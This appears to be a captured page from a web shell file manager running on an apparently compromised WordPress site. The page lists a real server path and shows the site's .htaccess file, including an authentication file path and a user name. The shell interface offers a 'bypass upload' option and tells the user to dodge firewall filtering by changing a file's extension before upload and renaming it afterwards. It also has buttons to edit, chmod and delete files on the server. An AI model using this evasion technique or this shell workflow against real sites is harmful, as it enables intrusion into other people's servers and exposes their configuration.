Search
Search
Search
Search
Information
Information
Light
Dark
Open actions menu
Basic upload method
Bypass upload method
Tips!
If you encounter an error (by firewall) while uploading using both methods,
try changing extension of the file before uploading it and rename it right after.
This uploader supports multiple file upload.
Submit
~
var
www
internationalhardwaresaudiarabia.bitkit.dk
httpdocs
File Content:
.htaccess
# BEGIN WordPress # The directives (lines) between "BEGIN WordPress" and "END WordPress" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. <IfModule mod_rewrite.c> RewriteEngine On RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}] RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule> RewriteEngine On RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}] RewriteBase / RewriteRule ^index\.php$ - [L] # add a trailing slash to /wp-admin RewriteRule ^([_0-9a-zA-Z-]+/)?wp-admin$ $1wp-admin/ [R=301,L] RewriteCond %{REQUEST_FILENAME} -f [OR] RewriteCond %{REQUEST_FILENAME} -d RewriteRule ^ - [L] RewriteRule ^([_0-9a-zA-Z-]+/)?(wp-(content|admin|includes).*) $2 [L] RewriteRule ^([_0-9a-zA-Z-]+/)?(.*\.php)$ $2 [L] RewriteRule . index.php [L] #AuthType Basic #AuthName "Restricted Area" #AuthUserFile /var/www/internationalhardwaresaudiarabia.bitkit.dk/httpdocs/.htpasswd #require user ihfuser # END WordPress # Options All -Indexes # Block WordPress xmlrpc.php requests # <Files xmlrpc.php> # order deny,allow # deny from all # allow from xxx.xxx.xxx.xxx # </Files> # Extra Security Headers # Header set X-Frame-Options SAMEORIGIN # Header set Strict-Transport-Security "max-age=31536000; includeSubDomains" # Header set X-XSS-Protection "1; mode=block" # Header set X-Content-Type-Options "nosniff" # Header set Referrer-Policy "same-origin" # Header always set Permissions-Policy "geolocation=(),midi=(),sync-xhr=(),microphone=(),camera=(),magnetometer=(),gyroscope=(),fullscreen=(self),payment=()"
Edit
Download
Unzip
Chmod
Delete